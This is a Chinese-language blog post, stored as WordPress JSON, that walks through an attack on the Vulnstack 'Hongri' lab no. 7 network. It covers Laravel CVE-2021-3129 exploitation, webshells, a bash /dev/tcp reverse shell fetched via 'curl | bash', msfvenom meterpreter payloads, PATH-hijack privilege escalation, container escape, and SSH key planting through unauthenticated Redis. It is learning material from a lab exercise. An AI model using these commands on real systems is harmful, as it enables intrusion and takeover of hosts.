{"id":164,"date":"2024-12-11T23:44:40","date_gmt":"2024-12-11T15:44:40","guid":{"rendered":"http:\/\/8.141.27.105\/?p=164"},"modified":"2024-12-11T23:47:36","modified_gmt":"2024-12-11T15:47:36","slug":"%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba7","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba7\/","title":{"rendered":"\u7ea2\u65e5\u9776\u573a7"},"content":{"rendered":"\n

\u642d\u5efa\u7565<\/p>\n\n\n\n

\u6253\u9776\uff1a<\/p>\n\n\n\n

\u5df2\u77e5\u76ee\u6807\u9776\u673ahttp:\/\/192.168.43.206<\/u><\/a><\/p>\n\n\n\n

Nmap\u626b\uff0c\u53d1\u73b022\u300180\u300181\u7aef\u53e3\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

22\u300180\u65e0\u6cd5\u8bbf\u95ee\uff0c81\u53ef\u4ee5\u8bbf\u95ee\uff0c\u5148\u4ece81\u5165\u624b\uff0c\u53d1\u73b0\u662flaravel\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u4e0a\u7f51\u641c\u7d22laravel\u6f0f\u6d1e\uff0c\u53d1\u73b0\u53ef\u80fd\u5b58\u5728<\/p>\n\n\n\n

CVE-2021-3129\uff1aLaravel\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c<\/p>\n\n\n\n

\uff0c\u4e0b\u8f7dexp\uff1aGitHub – SecPros-Team\/laravel-CVE-2021-3129-EXP<\/u><\/a>\uff0c\u5229\u7528\u6210\u529f\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
\n

\u54e5\u65af\u62c9\u4e0a\u7ebf\uff1a<\/p>\n<\/div>\n\n\n\n

V2.92\u53ef\u4ee5\u8fde\u4e0a\uff0c\u4f46\u9ad8\u7248\u672c\u53cd\u800c\u8fde\u4e0d\u4e0a\uff0c\u56e0\u4e3a\u9ad8\u7248\u672c\u7684\u54e5\u65af\u62c9\u751f\u6210\u7684\u9a6c\u7684\u52a0\u5bc6\u65b9\u5f0f\u5df2\u7ecf\u6539\u53d8\u4e86\u5bfc\u81f4\u4f1a\u8fde\u63a5\u5931\u8d25<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u54e5\u65af\u62c9\u547d\u4ee4\u65e0\u56de\u663e\uff0c\u4e0a\u4f20\u5c0f\u9a6c\u6362\u8681\u5251\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

(\u4ece\u8681\u5251\u8fc1\u79fb\u5230kali\uff0c\u6309\u7406\u5176\u5b9e\u8fd9\u4e00\u6b65\u4f5c\u7528\u4e0d\u5927\uff0c\u4f46\u662f\u5728\u540e\u9762\u63d0\u6743\u65f6\u5019\u8681\u5251\u65e0\u6cd5\u63d0\u6743\uff0c\u4e0d\u77e5\u9053\u4e3a\u4ec0\u4e48\uff09<\/p>\n\n\n\n

kali\uff1a<\/p>\n\n\n\n

\u5199\u4e00\u4e2ashell.sh\u6587\u4ef6\uff0c<\/p>\n\n\n\n

bash -i >& \/dev\/tcp\/192.168.52.128\/6666 0>&1<\/p>\n\n\n\n

\u8fd9\u53e5\u8bdd\u7684\u610f\u601d\u662f\u628a\u672c\u673ashell\u6267\u884c\u7684\u6b63\u786e\u7684\u8f93\u5165\u8f93\u51fa\u548c\u9519\u8bef\u7684\u8f93\u51fa\u5168\u90e8\u91cd\u5b9a\u5411\u5230192.168.52.128\u76846666\u7aef\u53e3\uff0c\u6240\u4ee5\u9700\u8981\u53d7\u5bb3\u673a\u6765\u6267\u884c\u8fd9\u4e2a\u8bed\u53e5\uff0c\u7531\u4e8e\u672c\u673a\u5f88\u53ef\u80fd\u9650\u5236\u4f7f\u7528bash\u8fd9\u4e2a\u547d\u4ee4\uff0c\u6240\u4ee5\u6709\u4e24\u79cd\u65b9\u6cd5\u3002\u4e00\u4e2a\u662f\u628a\u8fd9\u4e2a\u6587\u4ef6\u590d\u5236\u5230\u53d7\u5bb3\u673a\u4e0a\u6267\u884c\uff0c\u4e00\u4e2a\u662f\u5c31\u628a\u8fd9\u4e2a\u547d\u4ee4\u653e\u5728kali\u4e0a\uff0c\u5f00\u542f80\u7aef\u53e3\uff08http\u670d\u52a1\uff0c\u8fd9\u4e00\u6b65\u662f\u8ba9\u53d7\u5bb3\u673a\u80fd\u8bbf\u95ee\u5230\u8fd9\u4e2a\u6587\u4ef6\uff09\uff0c\u7136\u540e\u53d7\u5bb3\u673acurl\u8fd9\u4e2a\u6587\u4ef6\u3002<\/p>\n\n\n\n

\u5f00\u542f\u76d1\u542c<\/p>\n\n\n\n

nc -lvvp 6666 \u76d1\u542c6666\u7aef\u53e3<\/p>\n\n\n\n

python3 -m http.server 80  \u5f00\u542f80\u7aef\u53e3\u670d\u52a1\uff0c\u4e0d\u5f00\u7684\u8bdd\u53d7\u5bb3\u673a\u90a3\u8fb9\u8bbf\u95ee\u4e0d\u5230<\/p>\n\n\n\n

\u8681\u5251\u7528\u53d7\u5bb3\u673a\u6267\u884c<\/p>\n\n\n\n

curl 192.168.52.128\/shell.sh | bash<\/p>\n\n\n\n

\u51fa\u9519\uff0c\u53d1\u73b0\u662f\u56e0\u4e3a\u6587\u4ef6\u548c\u5f00\u542fhttp\u670d\u52a1\u4e0d\u5728\u540c\u4e00\u4e2a\u5730\u65b9\uff0c\u8fd9\u4e2a\u6587\u4ef6\u627e\u4e0d\u5230\uff0c\u9700\u8981\u5728\u6587\u4ef6\u540c\u4e00\u76ee\u5f55\u5f00\u542fhttp\u670d\u52a1\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u6210\u529f\u4e0a\u7ebf\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u53c2\u8003<\/p>\n\n\n\n

\u82b1\u4e00\u5929\u65f6\u95f4\u641e\u61c2\u53cd\u5f39shell\u7684\u547d\u4ee4\uff01bash -i \uff1e& \/dev\/tcp\/${HOST}\/${PORT} 0\uff1e&1\uff01_bash\u53cd\u5f39shell\u7684\u547d\u4ee4-CSDN\u535a\u5ba2<\/u><\/a><\/p>\n\n\n\n

Linux\u4e4bbash\u53cd\u5f39shell\u539f\u7406\u6d45\u6790_bash -i\u5f00\u6237\u4ea4\u4e92\u5f0f\u754c\u9762-CSDN\u535a\u5ba2<\/u><\/a>\uff09<\/p>\n\n\n\n

\u53d1\u73b0\u6709.dockerenv\u6587\u4ef6\uff0c\u6240\u4ee5\u662f\u5728\u5bb9\u5668\u4e2d\uff0c\u9700\u8981\u505a\u5bb9\u5668\u9003\u9038<\/p>\n\n\n\n

\uff08\u9644\uff1a\u5224\u65ad\u662f\u5426\u5728\u5bb9\u5668\u4e2d\u7684\u65b9\u6cd5\uff1a<\/p>\n\n\n\n

\u65b9\u5f0f\u4e00\uff1a\u5224\u65ad\u6839\u76ee\u5f55\u4e0b .dockerenv \u6587\u4ef6<\/p>\n\n\n\n

docker\u73af\u5883\u4e0b\uff1als -alh \/.dockerenv , \u975edocker\u73af\u5883\uff0c\u6ca1\u6709\u8fd9\u4e2a.dockerenv\u6587\u4ef6\u7684<\/p>\n\n\n\n

\/usr\/local\/tomcat >ls -alh \/.dockerenv<\/p>\n\n\n\n

-rwxr-xr-x 1 root root 0 Jan 22 06:54<\/p>\n\n\n\n

\/.dockerenv<\/p>\n\n\n\n

\u6ce8\uff1a\u5b9a\u5236\u5316\u6bd4\u8f83\u9ad8\u7684docker\u7cfb\u7edf\u4e5f\u53ef\u80fd\u6ca1\u6709\u8fd9\u4e2a\u6587\u4ef6<\/p>\n\n\n\n

\u65b9\u5f0f\u4e8c\uff1a\u67e5\u8be2\u7cfb\u7edf\u8fdb\u7a0b\u7684cgroup\u4fe1\u606f<\/p>\n\n\n\n

docker \u73af\u5883\u4e0b\uff1acat \/proc\/1\/cgroup<\/p>\n\n\n\n

\/usr\/local\/tomcat >cat<\/p>\n\n\n\n

\/proc\/1\/cgroup<\/p>\n\n\n\n

13:name=systemd:\/docker\/09dd4e5bfa91048ac3fbdfa6f951ea0648742fee7ee8d775190df8e88d609017<\/p>\n\n\n\n

12:pids:\/docker\/09dd4e5bfa91048ac3fbdfa6f951ea0648742fee7ee8d775190df8e88d609017<\/p>\n\n\n\n

11:hugetlb:\/docker\/09dd4e5bfa91048ac3fbdfa6f951ea0648742fee7ee8d775190df8e88d609017<\/p>\n\n\n\n

docker\u9003\u9038\uff1a<\/p>\n\n\n\n

\u521d\u8bc6Docker\u9003\u9038 – FreeBuf\u7f51\u7edc\u5b89\u5168\u884c\u4e1a\u95e8\u6237<\/u><\/a>:<\/p>\n\n\n\n

\u76ee\u524d\u7684 Docker \u9003\u9038\u7684\u539f\u56e0\u53ef\u4ee5\u5212\u5206\u4e3a\u4e09\u79cd\uff1a<\/p>\n\n\n\n

1.\u7531\u5185\u6838\u6f0f\u6d1e\u5f15\u8d77 \u2014\u2014Dirty COW(CVE-2016-5195)
2.\u7531 Docker \u8f6f\u4ef6\u8bbe\u8ba1\u5f15\u8d77\u2014\u2014CVE-2019-5736\u3001CVE-2019-14271
3.\u7531\u914d\u7f6e\u4e0d\u5f53\u5f15\u8d77\u2014\u2014\u5f00\u542fprivileged\uff08\u7279\u6743\u6a21\u5f0f\uff09+\u5bbf\u4e3b\u673a\u76ee\u5f55\u6302\u8f7d\uff08\u6587\u4ef6\u6302\u8f7d\uff09\u3001\u529f\u80fd\uff08capabilities\uff09\u673a\u5236\u3001sock\u901a\u4fe1\u65b9\u5f0f<\/p>\n\n\n\n

\u6bcf\u4e2a\u90fd\u5c1d\u8bd5\u4e00\u904d<\/p>\n\n\n\n

\u7531\u5185\u6838\u6f0f\u6d1e\u5f15\u8d77:<\/p>\n\n\n\n

\u810f\u725b\u63d0\u6743\u539f\u7406\uff1a<\/p>\n\n\n\n

\u810f\u725b(DirtyCow)Linux\u672c\u5730\u63d0\u6743\u6f0f\u6d1e\u590d\u73b0(CVE-2016-5195) – \u65e0\u540d\u4e4b\u8f88\u3002 – \u535a\u5ba2\u56ed (cnblogs.com)<\/u><\/a><\/p>\n\n\n\n

\u4e0b\u8f7d\u7684\u7b2c\u4e00\u4e2aexp\u6743\u9650\u6539\u4e86\u53c8\u53d8\u56de\u53bb\uff0c\u8681\u5251\u65e0\u6cd5\u4e0a\u4f20\uff0c\u4e8e\u662f\u53c8\u4e0b\u4e86\u4e00\u4e2a\uff0c\u8fd8\u662f\u4e0a\u4f20\u4e0d\u4e86\uff0c\u76f4\u63a5\u4f20.c\u6587\u4ef6\uff0c\u53d1\u73b0\u53ef\u4ee5\u4f20\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u4f46\u662fmake\u7684\u65f6\u5019\u63d0\u793a\u6ca1\u6709nasm\u8fd9\u4e2a\u547d\u4ee4\uff0c\u6240\u4ee5\u810f\u725b\u63d0\u6743\u7528\u4e0d\u4e86<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n


\u8bd5\u4e86\u597d\u591a\u79cd\u529e\u6cd5\u90fd\u6ca1\u7528\uff0c\u8fd8\u662f\u770b\u770bWP\u5427\uff1a<\/p>\n\n\n\n

\u4f7f\u7528\u67e5\u627e\u9ad8\u6743\u9650\u6587\u4ef6\u7684\u65b9\u5f0f\u6765\u63d0\u6743\uff1a<\/p>\n\n\n\n

\u63d0\u6743\u53ea\u662f\u9003\u9038\u7684\u4e00\u90e8\u5206\uff01\uff01\uff01<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

Linux \u201cfind\u201c \u547d\u4ee4\u67e5\u627e\u7279\u5b9a\u6743\u9650\u7684\u6587\u4ef6\uff08-perm\u53c2\u6570\uff09-CSDN\u535a\u5ba2<\/u><\/a><\/p>\n\n\n\n

find \/ -perm \/u=s<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u627e\u5230\u4e00\u4e2a\u9ad8\u6743\u9650\u6587\u4ef6\uff0ccat\u4e00\u4e0b\uff0c\u663e\u793a\u4e71\u7801\uff0c\u91c7\u7528\u4e00\u884c\u4ee3\u7801\u6765\u53d1\u73b0\u547d\u4ee4<\/p>\n\n\n\n

xxd \/script\/shell | grep ps<\/p>\n\n\n\n

\u53d1\u73b0\u8fd9\u4e2a\u6587\u4ef6\u6267\u884c\u4e86ps\u547d\u4ee4<\/p>\n\n\n\n

\u91c7\u7528\u73af\u5883\u53d8\u91cf\u52ab\u6301\u7684\u65b9\u6cd5\u63d0\u6743\uff1a<\/p>\n\n\n\n

\uff08\u73af\u5883\u53d8\u91cf\u52ab\u6301\uff1aLinux\u73af\u5883\u53d8\u91cf\u52ab\u6301\u63d0\u6743_linux find \u547d\u4ee4\u52ab\u6301-CSDN\u535a\u5ba2<\/u><\/a>\uff0c\u73af\u5883\u53d8\u91cf\u5176\u5b9e\u5c31\u662f\u4e2a\u8def\u5f84\uff0c\u628a\u67d0\u4e2a\u6587\u4ef6\u7684\u8def\u5f84\u6dfb\u52a0\u8fdb\u73af\u5883\u53d8\u91cf\u540e\uff0c\u5c31\u53ef\u4ee5\u4e0d\u7528\u5728\u5176\u6240\u5728\u6587\u4ef6\u5939\u901a\u8fc7\u547d\u4ee4\u6253\u5f00\u5b83\uff0c\u6bd4\u5982360.exe\u5728D\u76d8\uff0c\u5982\u679c\u6ca1\u6709\u6dfb\u52a0\u8fdb\u73af\u5883\u53d8\u91cf\uff0c\u5728F\u76d8\u6253\u5f00cmd\uff0c\u7136\u540e\u8f93\u5165360.exe\u662f\u80af\u5b9a\u6253\u5f00\u4e0d\u4e86\u7684\uff0c\u5982\u679c\u6709\u6dfb\u52a0\u73af\u5883\u53d8\u91cf\uff0c\u90a3\u5c31\u53ef\u4ee5\u6253\u5f00\u4e86\uff0c\u56e0\u4e3a\u7cfb\u7edf\u4f1a\u5148\u5728\u73af\u5883\u53d8\u91cf\u91cc\u9762\u627e\u5bf9\u5e94\u6587\u4ef6\u3002\u800c\u73af\u5883\u53d8\u91cf\u52ab\u6301\u5c31\u662f\u5229\u7528\u4e86\u7cfb\u7edf\u627e\u73af\u5883\u53d8\u91cf\u662f\u6709\u987a\u5e8f\u7684\u8fd9\u4e00\u7279\u70b9\uff0c\u628a\u4e00\u4e2a\u540c\u540d\u7684\u5047\u5192\u6587\u4ef6\u6dfb\u52a0\u5230\u73af\u5883\u53d8\u91cf\uff0c\u8fd9\u6837\u7cfb\u7edf\u4ee5\u7ba1\u7406\u5458\u6743\u9650\u6267\u884c\u8fd9\u4e00\u4e2a\u6587\u4ef6\u65f6\u5019\u6700\u5148\u627e\u5230\u7684\u5c31\u662f\u5047\u5192\u6587\u4ef6\uff0c\u5c31\u4f1a\u4ee5\u7ba1\u7406\u5458\u6743\u9650\u6267\u884c\u5047\u5192\u6587\u4ef6\u3002\uff09<\/p>\n\n\n\n

cd \/tmp<\/p>\n\n\n\n

echo “\/bin\/bash” > ps<\/p>\n\n\n\n

chmod 777 ps<\/p>\n\n\n\n

echo $PATH<\/p>\n\n\n\n

export PATH=\/tmp:$PATH # \u5c06\/tmp\u6dfb\u52a0\u5230\u73af\u5883\u53d8\u91cf\u4e2d\uff0c\u5e76\u4e14\u5148\u52a0\u8f7d\u6267\u884c\/tmp\u91cc\u7684\u7a0b\u5e8f<\/p>\n\n\n\n

cd \/home\/jobs<\/p>\n\n\n\n

.\/shell<\/p>\n\n\n\n

\uff08\u6dfb\u52a0\u53d8\u91cf\u53ef\u80fd\u9700\u8981\u4e00\u4f1a\u65f6\u95f4\uff09<\/p>\n\n\n\n

\u7ec8\u4e8e\u6210\u529f\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u63a5\u4e0b\u6765\u8bd5\u8bd5\u4e0a\u7ebfmsf\uff0c\uff08\u867d\u7136\u6ca1\u4ec0\u4e48\u7528\uff09<\/p>\n\n\n\n

msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=192.168.52.128 LPORT=4444 -f elf > shell9.10.elf<\/p>\n\n\n\n

use exploit\/multi\/handler<\/p>\n\n\n\n

set lhost 192.168.52.128<\/p>\n\n\n\n

set lport 4444<\/p>\n\n\n\n

set payload linux\/x86\/meterpreter\/reverse_tcp<\/p>\n\n\n\n

run<\/p>\n\n\n\n

\u8681\u5251\u4f20\u9a6c\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u5176\u5b9e\u4e5f\u53ef\u4ee5\u7528wget\u6765\u62ff\uff0c\u8681\u5251\u65b9\u4fbf\u70b9<\/p>\n\n\n\n

\u9700\u8981chmod 777\u624d\u80fd\u8fd0\u884c\uff0c\u8fd9\u91cc\u8681\u5251\u662f\u666e\u901a\u6743\u9650\u4e5f\u53ef\u4ee5\u8fd0\u884c<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u6210\u529f\u4e0a\u7ebf\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u603b\u7ed3\u4e00\u4e0b\u76ee\u524d\u7684\u5de5\u4f5c\uff0c\u6211\u4eec\u5df2\u77e5192.168.43.206\u8fd9\u4e2aIP\uff0c\u901a\u8fc781\u7aef\u53e3\u7684laravel\u6f0f\u6d1e\u6253\u8fdb\u53bb\uff0c\u53d1\u73b0\u5728docker\u5bb9\u5668\u91cc\u9762\uff0c\u4e3a\u4e86\u9003\u9038\uff0c\u5148\u8fdb\u884c\u63d0\u6743\uff0c\u5229\u7528\u9ad8\u6743\u9650\u6587\u4ef6\u7684\u73af\u5883\u53d8\u91cf\u52ab\u6301\uff0c\u6211\u4eec\u62ff\u5230\u4e86docker\u5bb9\u5668\u7684root\u6743\u9650\uff0c\u6240\u4ee5\u63a5\u4e0b\u6765\u8981\u505a\u5bb9\u5668\u9003\u9038\uff0c\u53c2\u8003Vulnstack\u7ea2\u65e5\u5185\u7f51\u9776\u573a\uff08\u4e03\uff09-\u5b66\u4e60\u8fc7\u7a0b\u7b14\u8bb0 – FreeBuf\u7f51\u7edc\u5b89\u5168\u884c\u4e1a\u95e8\u6237<\/u><\/a><\/p>\n\n\n\n

\u5148\u5728\u53d7\u5bb3\u673a\u7684\u5bb9\u5668\u91cc\u9762\u770b\u4e00\u4e0b<\/p>\n\n\n\n

fdisk -l  #\u67e5\u770b\u78c1\u76d8\u6587\u4ef6<\/p>\n\n\n\n

ls \/dev  #\u67e5\u770b\u8bbe\u5907\u6587\u4ef6<\/p>\n\n\n\n

\u53d1\u73b0\u6709\u51e0\u4e2a\u76d8\uff0c\u5176\u4e2d\u4e00\u4e2a\u662f\/dev\/sda1<\/p>\n\n\n\n

\u628a\/dev\/sda1\u6302\u8f7d\u5230\u5bb9\u5668\u91cc\u9762\u65b0\u5efa\u7684\u6587\u4ef6f\uff0c\u6302\u8f7d\u7684\u4f5c\u7528\u5c31\u662f\u5728\u5bb9\u5668\u91cc\u9762\u80fd\u770b\u5230\u5bb9\u5668\u5916\u9762\u7684\u6587\u4ef6<\/p>\n\n\n\n

mkdir f  #\u521b\u5efa\u540d\u4e3af\u7684\u6587\u4ef6\u5939<\/p>\n\n\n\n

mount  \/dev\/sda1 f  #\u628asda1\u6302\u8f7d\u5230f<\/p>\n\n\n\n

ls f<\/p>\n\n\n\n

\u53d1\u73b0\u5bb9\u5668\u5916\u7684 \/dev\/sda1\u91cc\u9762\u6709\u4e00\u4e2a\u7528\u6237ubuntu\uff0c\u63a5\u4e0b\u6765\u5c1d\u8bd5ssh\u516c\u94a5\u767b\u5f55\uff1a<\/p>\n\n\n\n

\u5148\u5728kali\u4e0a\u521b\u5efassh\u516c\u94a5\uff1a<\/p>\n\n\n\n

ssh-keygen -f f<\/p>\n\n\n\n

chmod 600 f<\/p>\n\n\n\n

cat f.hub<\/p>\n\n\n\n

\u7136\u540e\u5728\u76ee\u6807\u5bb9\u5668\u91cc\u9762\u6267\u884c<\/p>\n\n\n\n

cp -avx \/f\/home\/ubuntu\/.ssh\/id_rsa.pub \/f\/home\/ubuntu\/.ssh\/authorized_keys    #avx\u662f\u5c06\u6743\u9650\u4e5f\u4e00\u8d77\u590d\u5236<\/p>\n\n\n\n

echo > \/f\/home\/ubuntu\/.ssh\/authorized_keys #\u6e05\u7a7aauthorized_keys\u6587\u4ef6<\/p>\n\n\n\n

echo ‘f.pub\u6587\u4ef6\u7684\u5185\u5bb9’ > \/f\/home\/ubuntu\/.ssh\/authorized_keys #\u5c06ssh\u79d8\u94a5\u5199\u5165authorized_keys\u6587\u4ef6<\/p>\n\n\n\n

\u8fd9\u91ccf.hub\u6587\u4ef6\u7684\u5185\u5bb9\u662f\u4e0a\u4e00\u4e2a\u4ee3\u7801\u5757\u7684cat f.hub\u5f97\u5230\u7684<\/p>\n\n\n\n

\u7136\u540ekali\u8fde\u63a5\uff1a<\/p>\n\n\n\n

ssh -i f ubuntu@192.168.43.206<\/p>\n\n\n\n

\u8fde\u63a5\u5931\u8d25\uff0c\u6000\u7591\u662f\u5f00\u4e86\u4ee3\u7406<\/p>\n\n\n\n

\u7a77\u9014\u672b\u8def\uff0c\u4f46\u662f\u8fd8\u6709\u4e00\u4e2aredis\u8bbf\u95ee\u672a\u6388\u6743\uff08\u6211\u7684NMAP\u6ca1\u626b\u51fa\u6765redis\uff0c\u770bWP\u77e5\u9053\u7684\uff09<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u9a8c\u8bc1\u4e00\u4e0b\uff0c\u53d1\u73b0\u8fde\u4e0a\u4e86\uff1a<\/p>\n\n\n\n

\u90a3\u5c31\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2aredis\u505a\u6587\u7ae0\uff0credis\u672a\u6388\u6743\u8fde\u63a5\u6709\u597d\u51e0\u79cd\u5199shell\u7684\u529e\u6cd5\uff0c\u8fd9\u91cc\u7528ssh\u5bc6\u94a5\u7684\u65b9\u6cd5<\/p>\n\n\n\n

ssh-keygen -t rsa #\u751f\u6210\u516c\u94a5<\/p>\n\n\n\n

(echo -e “\\n\\n”; cat \/root\/.ssh\/id_rsa.pub; echo -e “\\n\\n”) > rsa.txt #\u5c06\u516c\u94a5\u5bfc\u5165rsa.txt\u6587\u4ef6<\/p>\n\n\n\n

cat rsa.txt | redis-cli -h 192.168.43.206 -p 6379 -x set hello #\u628arsa.txt\u6587\u4ef6\u5185\u5bb9\u5199\u5165\u76ee\u6807\u4e3b\u673a\u7684redis\u7f13\u51b2\u4e2d<\/p>\n\n\n\n

\uff08ssh-keygen -t rsa #\u751f\u6210\u516c\u94a5<\/p>\n\n\n\n

(echo -e “\\n\\n”; cat \/root\/.ssh\/id_rsa.pub; echo -e “\\n\\n”) > rsa.txt #\u5c06\u516c\u94a5\u5bfc\u5165rsa.txt\u6587\u4ef6<\/p>\n\n\n\n

cat rsa.txt | redis-cli -h 192.168.43.206 -p 6379 -x set hello #\u628arsa.txt\u6587\u4ef6\u5185\u5bb9\u5199\u5165\u76ee\u6807\u4e3b\u673a\u7684redis\u7f13\u51b2\u4e2d\uff09<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u7136\u540e\u5728redis\u8fde\u4e0a\u7684\u7ec8\u7aef\u8bbe\u7f6e\u4e00\u4e0b\uff1a<\/p>\n\n\n\n

config set dir \/root\/.ssh # \u8bbe\u7f6eredis\u7684\u5907\u4efd\u8def\u5f84\u4e3a\/root\/.ssh\/<\/p>\n\n\n\n

config set dbfilename authorized_keys # \u8bbe\u7f6e\u4fdd\u5b58\u6587\u4ef6\u540d\u4e3aauthorized_keys<\/p>\n\n\n\n

\u6210\u529f\u901a\u8fc7\u516c\u94a5\u8fde\u63a5\u4e0a\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

ifconfig\u4e00\u4e0b\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u6210\u529f\u62ff\u523043.206\uff0c\u5b83\u7684\u5185\u7f51ip\u662f52.10\uff0c\u5185\u7f51\u6bb5\u5c31\u5e94\u8be5\u662f52\uff0c\u800c\u4e14\u4e0d\u5728docker\u91cc\u9762<\/p>\n\n\n\n

\uff08\u8fd9\u91cc\u51fa\u4e86\u4e2a\u5c0f\u63d2\u66f2\uff0c\u4e4b\u524d\u901a\u8fc7curl\u62ff\u5230\u7684docker\u4e0d\u5c0f\u5fc3\u5173\u4e86\uff0c\u7136\u540e\u91cd\u542f\u65f6\u5019\u53d1\u73b0\u672c\u5730\u5f00\u4e0d\u4e86\u670d\u52a1\uff0c\u7aef\u53e3\u88ab\u5360\u7528\uff0c\u4e8e\u662f\uff1a<\/p>\n\n\n\n

netstat -ntulp | grep 80 \/\/\u67e5\u770b\u7aef\u53e3<\/p>\n\n\n\n

fuser -k -n tcp 80 \/\/\u6740\u6389\u7aef\u53e3\u7684\u8fdb\u7a0b<\/p>\n\n\n\n

\u7136\u540e\u5c31\u80fd\u542f\u52a8\u4e86<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\uff09<\/p>\n\n\n\n

\u63a5\u7740\u7ee7\u7eed\uff0c\u62ff\u5230\u4e8643.206\uff0c\u4f46\u662f\u521a\u521a\u8fde43.206\u8fde\u4e0d\u4e0a\uff0c\u6000\u7591\u7528\u4e86\u4ee3\u7406\uff0c\u68c0\u6d4b\u4e00\u4e0b<\/p>\n\n\n\n

\u9996\u5148\u53d1\u73b0home\u4e0b\u9762\u662f\u4e2aweb\uff0c\u800c\u4e0d\u662fubuntu<\/p>\n\n\n\n

\u7136\u540e<\/p>\n\n\n\n

cd \/etc\/nginx\/conf.d<\/p>\n\n\n\n

cat 81.conf<\/p>\n\n\n\n

\u67e5\u770b81\u7aef\u53e3\u662f\u5426\u6709\u53cd\u5411\u4ee3\u7406\uff0c<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u679c\u7136\u88ab\u53cd\u5411\u4ee3\u7406\u4e86\uff0c\u4ee3\u7406\u4e3b\u673a\u662f52.20<\/p>\n\n\n\n

arp -n \u4e00\u4e0b\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u6240\u4ee5\u5c31\u77e5\u9053\u4e86\u4e3a\u4ec0\u4e48\u524d\u9762ssh\u8fde\u63a543.206\u8fde\u63a5\u4e0d\u4e0a\uff0c\u56e0\u4e3a81\u7aef\u53e3\u7ed952.20\u53cd\u5411\u4ee3\u7406\u4e86\uff0cdocker\u5bb9\u5668\u5b9e\u9645\u4e0a\u572852.20\u4e0a\uff0c\u800credis\u80fd\u8fde\u4e0a\u662f\u56e0\u4e3a\u5b83\u4f7f\u7528\u7684\u7aef\u53e3\u6ca1\u6709\u8fdb\u884c\u53cd\u5411\u4ee3\u7406\uff0c\u4e8e\u662f\u5728kali\u91cd\u65b0\u5c1d\u8bd5\u8fde\u63a5<\/p>\n\n\n\n

ssh -i f ubuntu@192.168.52.20<\/p>\n\n\n\n

\u6210\u529f\u8fde\u4e0a\uff01\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u5230\u8fd9\u91cc\u518d\u603b\u7ed3\u4e00\u4e0b\u76ee\u524d\u7684\u5de5\u4f5c\uff0c\u6211\u4eec\u5df2\u77e5192.168.43.206\u8fd9\u4e2aIP\uff0c\u901a\u8fc781\u7aef\u53e3\u7684laravel\u6f0f\u6d1e\u6253\u8fdb\u53bb\uff0c\u53d1\u73b0\u5728docker\u5bb9\u5668\u91cc\u9762\uff0c\u4e3a\u4e86\u9003\u9038\uff0c\u5148\u8fdb\u884c\u63d0\u6743\uff0c\u5229\u7528\u9ad8\u6743\u9650\u6587\u4ef6\u7684\u73af\u5883\u53d8\u91cf\u52ab\u6301\uff0c\u62ff\u5230\u4e86docker\u5bb9\u5668\u7684root\u6743\u9650\uff0c\u7136\u540e\u8fdb\u884cssh\u5bc6\u94a5\uff08\u7b2c\u4e00\u6b21ssh\uff09\u8fde\u63a5\u9003\u9038\u7684\u65f6\u5019\u53d1\u73b0\u8fde\u4e0d\u4e0a\uff0c\u91c7\u53d6\u53e6\u4e00\u4e2a\u7a81\u7834\u53e3redis\u672a\u6388\u6743\uff0c\u901a\u8fc7redis\u53c8\u5199\u4e86\u4e2assh\u6210\u529f\u8fde\u63a5\uff08\u7b2c\u4e8c\u6b21ssh\uff09\uff0c\u8fde\u63a5\u4e0a\u7684\u6b63\u662f43.206.\u901a\u8fc7\u4fe1\u606f\u6536\u96c6\u53d1\u73b043.206\u768481\u7aef\u53e3\u4f7f\u7528\u4e86\u53cd\u5411\u4ee3\u7406\uff0c\u4ee3\u7406\u4e3b\u673a\u662f52.20\uff0c\u4e8e\u662f\u66f4\u6539\u7b2c\u4e00\u6b21ssh\u7684\u5730\u5740\u621052.20\uff0c\u6210\u529f\u8fde\u4e0a\uff0c\u81f3\u6b64\u62ff\u4e0b\u4e8643.206\u548c52.20\u3002<\/p>\n\n\n\n

